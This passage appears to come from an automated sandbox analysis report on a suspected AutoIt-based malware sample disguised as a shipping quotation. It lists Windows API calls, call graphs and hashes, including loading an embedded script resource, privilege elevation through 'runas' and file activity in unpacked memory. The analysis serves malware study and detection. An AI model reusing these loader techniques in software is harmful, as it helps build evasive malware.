97744->97705 97745->97709 97746->97706 97747->97711 97748->97715 97749->97718 97750->97718 97751->97718 97752->97718 97753->97672 97754->97676 97755->97682 97756->97690 97757->97700 97759 63aec9 22 API calls 97758->97759 97760 634c78 97759->97760 97760->97726 97761 633156 97764 633170 97761->97764 97765 633187 97764->97765 97766 6331eb 
97765->97766 97767 63318c 97765->97767 97804 6331e9 97765->97804 97771 6331f1 97766->97771 97772 672dfb 97766->97772 97768 633265 PostQuitMessage 97767->97768 97769 633199 97767->97769 97806 63316a 97768->97806 97774 6331a4 97769->97774 97775 672e7c 97769->97775 97770 6331d0 DefWindowProcW 97770->97806 97776 6331f8 97771->97776 97777 63321d SetTimer RegisterWindowMessageW 97771->97777 97813 6318e2 10 API calls 97772->97813 97779 6331ae 97774->97779 97780 672e68 97774->97780 97818 69bf30 34 API calls 97775->97818 97783 633201 KillTimer 97776->97783 97784 672d9c 97776->97784 97781 633246 CreatePopupMenu 97777->97781 97777->97806 97778 672e1c 97814 64e499 42 API calls 97778->97814 97787 6331b9 97779->97787 97797 672e4d 97779->97797 97817 69c161 27 API calls 97780->97817 97781->97806 97809 6330f2 Shell_NotifyIconW 97783->97809 97788 672dd7 MoveWindow 97784->97788 97789 672da1 97784->97789 97792 6331c4 97787->97792 97793 633253 97787->97793 97788->97806 97795 672da7 97789->97795 97796 672dc6 SetFocus 97789->97796 97791 633263 97791->97806 97792->97770 97815 6330f2 Shell_NotifyIconW 97792->97815 97811 63326f 44 API calls 97793->97811 97794 672e8e 97794->97770 97794->97806 97795->97792 97800 672db0 97795->97800 97796->97806 97797->97770 97816 690ad7 22 API calls 97797->97816 97798 633214 97810 633c50 DeleteObject DestroyWindow 97798->97810 97812 6318e2 10 API calls 97800->97812 97804->97770 97807 672e41 97808 633837 49 API calls 97807->97808 97808->97804 97809->97798 97810->97806 97811->97791 97812->97806 97813->97778 97814->97792 97815->97807 97816->97804 97817->97791 97818->97794 97819 63105b 97824 63344d 97819->97824 97821 63106a 97855 6500a3 29 API calls 97821->97855 97823 631074 97825 63345d 97824->97825 97826 63a961 22 API calls 97825->97826 97827 633513 97826->97827 97828 633a5a 24 API calls 97827->97828 97829 63351c 97828->97829 97856 633357 97829->97856 97832 6333c6 22 API calls 97833 633535 97832->97833 97834 63515f 22 API calls 97833->97834 97835 633544 
97834->97835 97836 63a961 22 API calls 97835->97836 97837 63354d 97836->97837 97838 63a6c3 22 API calls 97837->97838 97839 633556 RegOpenKeyExW 97838->97839 97840 673176 RegQueryValueExW 97839->97840 97844 633578 97839->97844 97841 673193 97840->97841 97842 67320c RegCloseKey 97840->97842 97843 64fe0b 22 API calls 97841->97843 97842->97844 97853 67321e 97842->97853 97845 6731ac 97843->97845 97844->97821 97846 635722 22 API calls 97845->97846 97847 6731b7 RegQueryValueExW 97846->97847 97848 6731d4 97847->97848 97850 6731ee 97847->97850 97849 636b57 22 API calls 97848->97849 97849->97850 97850->97842 97851 639cb3 22 API calls 97851->97853 97852 63515f 22 API calls 97852->97853 97853->97844 97853->97851 97853->97852 97854 634c6d 22 API calls 97853->97854 97854->97853 97855->97823 97857 671f50 97856->97857 97858 633364 GetFullPathNameW 97857->97858 97859 633386 97858->97859 97860 636b57 22 API calls 97859->97860 97861 6333a4 97860->97861 97861->97832 97862 631098 97867 6342de 97862->97867 97866 6310a7 97868 63a961 22 API calls 97867->97868 97869 6342f5 GetVersionExW 97868->97869 97870 636b57 22 API calls 97869->97870 97871 634342 97870->97871 97872 6393b2 22 API calls 97871->97872 97877 634378 97871->97877 97873 63436c 97872->97873 97875 6337a0 22 API calls 97873->97875 97874 63441b GetCurrentProcess IsWow64Process 97876 634437 97874->97876 97875->97877 97878 673824 GetSystemInfo 97876->97878 97879 63444f LoadLibraryA 97876->97879 97877->97874 97883 6737df 97877->97883 97880 634460 GetProcAddress 97879->97880 97881 63449c GetSystemInfo 97879->97881 97880->97881 97884 634470 GetNativeSystemInfo 97880->97884 97882 634476 97881->97882 97885 63109d 97882->97885 97886 63447a FreeLibrary 97882->97886 97884->97882 97887 6500a3 29 API calls 97885->97887 97886->97885 97887->97866 97888 63f7bf 97889 63f7d3 97888->97889 97890 63fcb6 97888->97890 97892 63fcc2 97889->97892 97893 64fddb 22 API calls 97889->97893 97925 63aceb 23 API calls 97890->97925 97926 63aceb 23 API calls 

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0063430D
                                                                            • GetCurrentProcess.KERNEL32(?,006CCB64,00000000,?,?), ref: 00634422
                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00634429
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00634454
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00634466
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00634474
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0063447B
                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 006344A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                            • API String ID: 2834427828-3101561225
                                                                            • Opcode ID: a63559da5bd6162c24c9cbcf14bb88b9be82f6800990b4f7e55cca837b2859d4
                                                                            • Instruction ID: b03e128e12e83d733822e328c408970c35ab16057cf0d0e0f7af0ce3e40bc736
                                                                            • Opcode Fuzzy Hash: a63559da5bd6162c24c9cbcf14bb88b9be82f6800990b4f7e55cca837b2859d4
                                                                            • Instruction Fuzzy Hash: BCA1E67190A2D0CFC715C7797C815E5FFE6AB26300F88D6ADE04593B22DE284505DB6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006350AA,?,?,00000000,00000000), ref: 006342B2
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006350AA,?,?,00000000,00000000), ref: 006342C9
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20), ref: 006735BE
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20), ref: 006735D3
                                                                            • LockResource.KERNEL32(006350AA,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20,?), ref: 006735E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: 23db2834aa71d53b9cdbbf210e50088b47e40ec907f83e4bf79df59680d5f862
                                                                            • Instruction ID: 8604bbcaa76e4579a7d6aa33c29e44d136c9972d32611f01b5f57f0bcfe28acd
                                                                            • Opcode Fuzzy Hash: 23db2834aa71d53b9cdbbf210e50088b47e40ec907f83e4bf79df59680d5f862
                                                                            • Instruction Fuzzy Hash: 54117C70200700BFE7218BA6DC48F67BBBEEFC6B61F148169F416D6650DB71ED009A60

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00632B6B
                                                                              • Part of subcall function 00633A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00701418,?,00632E7F,?,?,?,00000000), ref: 00633A78
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,006F2224), ref: 00672C10
                                                                            • ShellExecuteW.SHELL32(00000000,?,?,006F2224), ref: 00672C17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: runas
                                                                            • API String ID: 3686610399-4000483414
                                                                            • Opcode ID: 7c982ef35b9d211421c3141edae0dcc231e6923d5bba5f44f15f6c8910019063
                                                                            • Instruction ID: 99c77ee5e290fbee14c513b7ee692cc5456b9a343cd5bea456a3d07830787235
                                                                            • Opcode Fuzzy Hash: 7c982ef35b9d211421c3141edae0dcc231e6923d5bba5f44f15f6c8910019063
                                                                            • Instruction Fuzzy Hash: 95112931508386AAC748FF60D861DBEB7A79F90314F44542CF187421A2CF708A0ACB96
                                                                            APIs
                                                                            • GetInputState.USER32 ref: 0063D807
                                                                            • timeGetTime.WINMM ref: 0063DA07
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063DB28
                                                                            • TranslateMessage.USER32(?), ref: 0063DB7B
                                                                            • DispatchMessageW.USER32(?), ref: 0063DB89
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063DB9F
                                                                            • Sleep.KERNEL32(0000000A), ref: 0063DBB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                            • String ID:
                                                                            • API String ID: 2189390790-0
                                                                            • Opcode ID: f5193610422caab80218868c4b628e0309f857624dd349c7b445ffd32ae5a818
                                                                            • Instruction ID: b8590a233233aa242953f94f91d7c8b306a63849726b0ee32efc2cce99f736aa
                                                                            • Opcode Fuzzy Hash: f5193610422caab80218868c4b628e0309f857624dd349c7b445ffd32ae5a818
                                                                            • Instruction Fuzzy Hash: C042FE70608242EFD728DF24D894BAAB7E2FF46314F14865EE4668B391D770E845CBC6

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00632D07
                                                                            • RegisterClassExW.USER32(00000030), ref: 00632D31
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00632D42
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00632D5F
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00632D6F
                                                                            • LoadIconW.USER32(000000A9), ref: 00632D85
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00632D94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 9bb6ae46914f2fc8d1de5991c67d34b8fa56909035105b5259ab121dacd6ed6f
                                                                            • Instruction ID: e5cc5c9df5a9e3ca2fa3b21c5780814eb03578c0e8097a9d1d803bee3b6516f0
                                                                            • Opcode Fuzzy Hash: 9bb6ae46914f2fc8d1de5991c67d34b8fa56909035105b5259ab121dacd6ed6f
                                                                            • Instruction Fuzzy Hash: E821E3B1D11348EFDB00DFA4E859BEDBBB5FB08710F00821AF615A62A0DBB51540CFA4

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00632B8E
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00632B9D
                                                                            • LoadIconW.USER32(00000063), ref: 00632BB3
                                                                            • LoadIconW.USER32(000000A4), ref: 00632BC5
                                                                            • LoadIconW.USER32(000000A2), ref: 00632BD7
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00632BEF
                                                                            • RegisterClassExW.USER32(?), ref: 00632C40
                                                                              • Part of subcall function 00632CD4: GetSysColorBrush.USER32(0000000F), ref: 00632D07
                                                                              • Part of subcall function 00632CD4: RegisterClassExW.USER32(00000030), ref: 00632D31
                                                                              • Part of subcall function 00632CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00632D42
                                                                              • Part of subcall function 00632CD4: InitCommonControlsEx.COMCTL32(?), ref: 00632D5F
                                                                              • Part of subcall function 00632CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00632D6F
                                                                              • Part of subcall function 00632CD4: LoadIconW.USER32(000000A9), ref: 00632D85
                                                                              • Part of subcall function 00632CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00632D94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: 70a6ade5f7e87c0dab04a9c35a46db45f04d933a73a4c2f420d7392a2f08a599
                                                                            • Instruction ID: 7225ec861387c3495bc00b9d8ecd0a580b22133e97d11720c2f9b1fe218ff8bf
                                                                            • Opcode Fuzzy Hash: 70a6ade5f7e87c0dab04a9c35a46db45f04d933a73a4c2f420d7392a2f08a599
                                                                            • Instruction Fuzzy Hash: 5F212970E00318EBDB109FA5EC59BA9BFF5FB48B54F44811AF504A76A0DBB94540CF98

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0063316A,?,?), ref: 006331D8
                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,0063316A,?,?), ref: 00633204
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00633227
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0063316A,?,?), ref: 00633232
                                                                            • CreatePopupMenu.USER32 ref: 00633246
                                                                            • PostQuitMessage.USER32(00000000), ref: 00633267
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 5c84e93fc7d71c8fe5fb1970bab0b19d92d19c8ea54dbbf7be0130f2c57f5b4d
                                                                            • Instruction ID: f59932527a930ce4fee6fcdb2cb530b76d4dab7970c53c68a670530c93cf1aad
                                                                            • Opcode Fuzzy Hash: 5c84e93fc7d71c8fe5fb1970bab0b19d92d19c8ea54dbbf7be0130f2c57f5b4d
                                                                            • Instruction Fuzzy Hash: 5E415931600220EBDB141B7CDD1DBBA3A5BEB05350F448229F50A867E1CB7A9F4197E9

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00633A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00701418,?,00632E7F,?,?,?,00000000), ref: 00633A78
                                                                              • Part of subcall function 00633357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00633379
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0063356A
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0067318D
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006731CE
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00673210
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 338900592-2727554177
                                                                            • Opcode ID: 2986aa4c1b77c3f00f43ea74383ef3fa890511c5b7925c79569abc1430533c72
                                                                            • Instruction ID: 3b91fcb4134024bc32fa7091080235036a7b224c861c98d50350febf6473ccac
                                                                            • Opcode Fuzzy Hash: 2986aa4c1b77c3f00f43ea74383ef3fa890511c5b7925c79569abc1430533c72
                                                                            • Instruction Fuzzy Hash: 7A71C172404300DEC344DF64DC859ABFBE9FF84350F50892EF549932A2DB789A49CBA9

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0067039A: CreateFileW.KERNELBASE(00000000,00000000,?,00670704,?,?,00000000,?,00670704,00000000,0000000C), ref: 006703B7
                                                                            • GetLastError.KERNEL32 ref: 0067076F
                                                                            • GetFileType.KERNELBASE(00000000), ref: 00670782
                                                                            • GetLastError.KERNEL32 ref: 0067078C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006707B5
                                                                            • CloseHandle.KERNEL32(?), ref: 006708FF
                                                                            • GetLastError.KERNEL32 ref: 00670931
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 3086256261-2852464175
                                                                            • Opcode ID: 64251a19f568036642363132c7f1f932db0b1d85afb2526b7c8bb197c4acb475
                                                                            • Instruction ID: 6cf462e6730db1696a19f7e69e935a4280c2f4caca3107ffe2b420e655081849
                                                                            • Opcode Fuzzy Hash: 64251a19f568036642363132c7f1f932db0b1d85afb2526b7c8bb197c4acb475
                                                                            • Instruction Fuzzy Hash: 5BA15532A00144CFEF19EF68D851BAE3BA2AB06324F14815DF819DB391CB309D13CBA5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0106C1D1
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0106C3F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                            • Instruction ID: 1a522708efe742e8c8f4d461deba1c57ab520a7b3593163d81583d5078f48b7b
                                                                            • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                            • Instruction Fuzzy Hash: BBA10A70E00219EBEB14CFE4C994BEEBBB9FF48304F208199E595BB280D7759A41CB54

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 781 632c63-632cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00632C91
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00632CB2
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00631CAD,?), ref: 00632CC6
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00631CAD,?), ref: 00632CCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 4873159ea496f70de9ef52ce7c26476a900b7cc92169ea7641d43232f6b62bb8
                                                                            • Instruction ID: 3aae6abc2185fe1c4e8f7ff02a0f5b2e019e29dbc4f9494093786e5fb2234d88
                                                                            • Opcode Fuzzy Hash: 4873159ea496f70de9ef52ce7c26476a900b7cc92169ea7641d43232f6b62bb8
                                                                            • Instruction Fuzzy Hash: 0CF03A75940390BAEB301B13AC1CE77AEBED7C6F60B40911EF904A25A0CA790840DAB8

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0106BDD0: Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0106BFEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: Y19YV6C6WGSBFMB010
                                                                            • API String ID: 2694422964-4211810753
                                                                            • Opcode ID: bc985148a7938dfab6a7a995fb8e4606f88cd43cf74661d12d51f3c5e4919924
                                                                            • Instruction ID: 02dee5578fd98b61740b3d1367c8d47068f8fb48cad1444809e7737d5c5a67a3
                                                                            • Opcode Fuzzy Hash: bc985148a7938dfab6a7a995fb8e4606f88cd43cf74661d12d51f3c5e4919924
                                                                            • Instruction Fuzzy Hash: C7517171D04249EBFF11DBE4C814BEEBBB9AF15300F004199E249BB2C1D6B91B49CBA5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B40
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B61
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
